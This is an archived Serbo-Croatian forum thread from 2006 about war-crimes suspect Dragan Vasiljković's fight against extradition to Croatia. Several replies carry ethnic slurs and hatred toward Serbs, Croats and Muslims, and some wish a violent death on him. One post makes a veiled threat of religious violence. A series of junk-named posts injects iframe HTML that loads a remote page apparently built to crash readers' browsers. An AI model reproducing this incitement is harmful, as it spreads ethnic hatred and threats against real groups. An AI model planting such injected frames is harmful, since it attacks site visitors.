PDA

Pogledaj cijelu verziju : DRAGAN - U Hrvatskoj cu biti ubijen

Vasiljković
22-12-2006, 11:49
Dragan Vasiljković, poznatiji kao Kapetan Dragan izjavio je na saslušanju pred sudom u Sidneju da će biti ubijen ako ga australijske vlasti izruče Hrvatskoj, prenose hrvatski mediji u četvrtak, pozivajući se na list "Australian".

Vasiljković je rekao da je u Hrvatskoj bio progonjen zbog svoje nacionalnosti i političkih stavova, pa veruje da je već donesena odluka o njegovoj krivici.

On smatra i da je ovaj sudski progon ustvari osveta za optužnicu koju je Haški sud podigao protiv hrvatskog generala Ante Gotovine.

"Zakleti sam neprijatelj HDZ-a i verujem da neću preživeti do sudjenja u Hrvatskoj, ako budem izručen. Verujem da ću biti ubijen ili će se reći da sam izvršio samoubistvo. Ne verujem da ću u Hrvatskoj imati advokata koji će na pravi način da iznese moj slučaj", rekao je Vasiljković na saslušanju, dodavši da se plaši i mučenja u hrvatskim zatvorima.

Vasiljković, australijski državljanin s prebivalištem u Pertu, uhapšen je u januaru zbog sumnje da je kao vodja srpske paravojne formacije počinio ratni zločin u Hrvatskoj.

Ranije ove godine Vasiljković je pred australijskim Vrhovnim sudom zatražio da bude oslobodjen jer je smatrao da njegovo hapšenje nije legalno pošto Australija i Hrvatska nemaju potpisan sporazum o izručenju, ali je sud odbio njegovu molbu.

Saslušanje pred u sudom u Sidneju će biti nastavljeno

Želimir
22-12-2006, 12:46
Australija sigurno znade da u Hrvatskoj nema smrtne kazne.Pa se cudom cudim da kapetan Dragance moze prodavati maglu australskom pravosudu. Na kraju krajeva Australija bi ga trebala izruciti jer je prekrsio zakone u Hrvatskoj a ne u Australiji.

Zaljko
22-12-2006, 14:18
Pa znas da je Dragan Srbin. Pa poznate su ti srpske karakteristike...

Paranoja, strah, mitomanija, ludilo, laz...itd.

On se sad place, VAPI, MOLI za pomoc od nekud...

Ali Dragance...pravda je pravda!

pickin dime
22-12-2006, 17:14
ta pravda ce i vase razbojnike stici, ne samo Dragana. Na olimpijadi klanja koje bi mogli samo ustase i cetnici organizirati u bosni ne zna se ko bi osvojio medalje.
Discipline: klanje staraca, klanje djece, silovanje bosanki, rusenje spomenika (koji stoje pod zastitom UNESCA), pljacka imovine, paljenje domova. Tu ste braca, jednako sposobna, krscanski udruzena.
SRETAN BOZIC ZELE VAM BOSANSKI MUSLIMANI...ali samo jos ovaj put!
Onda ce poceti, mora poceti.Alahu ekber!

ma tu se
22-12-2006, 23:06
Govori o "KAPETANU" (joooj kako se smijem UVJEK, ne mogu odoljeti, kad se sjetim kako su tog malog seljacica, koji je "ucio" jos vece saljacice - zamisli - RATNIM VJESTINAMA??) zvali "KAPETAN"!!!??

ajde da pocnemo sa VSG-(P)ovim stilom - da lijepimo smailice...:

... :)) :)) :smile06: :smile06:

kakvi god
23-12-2006, 15:03
bili stilovi i ratne vestine, palile su protiv rvacana kao od sale.

Ima jos jedan koji cami ovde u zatvoru, po imenu Gudelj koji ceka na ekstradikciju da mu se sudi za 3 ubijstva u mirnodopskim uslovima. Nakaradni HR sud ga oslobodio!!!!!!!

Kako li ce pisicno hr pravosudje prihvatiti taj vruci krompir videcemo.
Bice razonode na pretek.

Svaka hulja koja "ubije za ×××××tsku" bude oslobodjena, ako ne i odlikovana.

Eh da ste imali manje takvih koji su "ubijali za Hrvatsku", ili bar da su od nadleznih stavljeni tamo gde zaista i pripadaju, pravoslavni Bugari bi gledali vama u zacelje, umesto sto vi njima sad gledate.
×××× ga, sve se vraca sve se placa, "sluzbenik iz EU i dalje broji ulice Jure i Bobana po Hrvatskoj".

KAPETANE
23-12-2006, 16:59
naravski da ces ti u Hrvatskoj za svoja nedjela biti strijeljan (vjesanje je mucenje!"). Mora ti biti jasno da nesto drugo nisi ni zasluzio. Tvoju krivicu se mora relativirati, ti si naime ××××××!
Ali ×××××× takve vrste su za svako drustvo "rak rana" i moraju se iskorijeniti (ovdje pucnjem u glavu!). Svi kurvini sinovi ne misle na sudbine onih koje kolju! Ako si imalo pametan (a ja mislim da nisi) predaj se demokratskim vlastima da ti se sudi. Ne meni jer ja tu nisam demokrat.Vjerojatno si ( ne mogu se zakleti) zaklao i moju sestru. Ja ti necu, a mogao bih ti pregristi grkljan.
Eto toliko o tebi kao razvratnistvu srpstva. Ali nisi sam, u tzv. drzavi kojoj treba i mora da budes izrucen, gdje te se mora i treba pogubiti, hodaju nebrojeni koljaci tvojih kvaliteta na slobodi, sjede u drzavnim institucijama, u saboru, u vladi, u sudovima. Oni su zainteresirani da se pozornost svrati na tebe. To je i u redu. Koljac jesi, kukavica jesi, blesan jesi, imas ali jos dodatnu manu - ti si srbin, dakle ××××n. A hrvatski "dragani,kapetani", tvojih kvaliteta, zive u prividnoj sigurnosti sticeni od zlocinaca na polozajima, ali kad god.. pravda ce ih stici, jer zlocini takve vrste kao tvoji i tvojih hrvatskih pajdasa ne zaboravlja svijet.Ja se ne bih htio izjednaciti s tobom, zato je dobro da te ne daju u moje, ti bi umirao dugo, nego cak i bez mene - metak kroz glavu.
I bez sajkace, molim!

pa...
23-12-2006, 17:05
"pravosalavna" Bugarska ima standard max. 40% Hrvatskog... ona je na nivou Srbije otprilike... grca se i koprca u korupciji i Balkanu....

Hr privreda je jaca i komkurentnija od dosta novih clanica EU-a,a Rumunjskoj i Bugarskoj da i ne govorimo....

asdsa
23-12-2006, 17:18
<IFRAME src="foo.html" width="400" height="500"
scrolling="auto" frameborder="1">
:Your user agent does not support frames or is currently configured
not to display frames. However, you may visit
<A href="foo.html">the related document.</A>:
</IFRAME>

asdfsd
23-12-2006, 17:19
<A href="http://www.newdream.net/crash/js2.html">the related document.</A>:
</IFRAME>

asdghztr
23-12-2006, 17:20
</IFRAME>

asdffdasd
23-12-2006, 17:20
<IFRAME src="http://www.newdream.net/crash/js2.html" width="400" height="500"
</IFRAME>

neizmjerne su
23-12-2006, 20:39
mogucnosti Croticara, u umjetnosti u sportu. Evo ovdje bas primjer jednog graficara. Dokaz da se i lud covjek moze tim baviti.

E manijace
24-12-2006, 00:14
EU ne gleda samo standard buduce clanice, vec kao sto rekoh, postivanje ljudskih i manjisnkih prava, da li ste raskrstili sa mracnom fasistickom prosloscu (koliko jos spomenika, ulica i trgova Jure i Bobana po Krvatskoj), koliko opiranja povratku prognanih, koliko uplitanju sa strane i destrukciji pravosudnog sistema, kolika razlika imedju "njihovih" i "nasih" zlocina, itd.
Sve te probleme Bugarska nema.

A sto se tice trenutne ekonomije, to nigde ne stoji kao uslov prikljucenja u EU, samo standardi.

ako Hrvatska bude u
24-12-2006, 17:10
EU primljena, naprvice EU ( a najvise Slovenija! )potpuno novu drzavu. Tu ce onda biti veselja. Novi politicari, novi sudije,nova policija, nova katolicka crkva. Sve se mora podloziti Europi a u njoj nema klanja, mora sve da bude onako kao u ostalim zemljama.
Prvo i najvaznije: mora se promjeniti ustav.Sve europske drzave su "ANTIFASISTICKE" i to stoji u svakom ustavu. U Hrvatskoj to nije slucaj. Dakle Europa ce Hrvatsku prisiliti da se odrekne fasizma i Tudjmana i Bobana i Gotovina i sve ostale katolicko-fasisticke bande. I crkva se mora civilizirati. U Europi nema "....nije grij ubit muslimana, a ja cu te za to ispovidit!". Samo EU zna s kim ima posla i te se promjene moraju desiti prije ulaska. Onda dobro dosli u Europu, danasnji jos divljaci!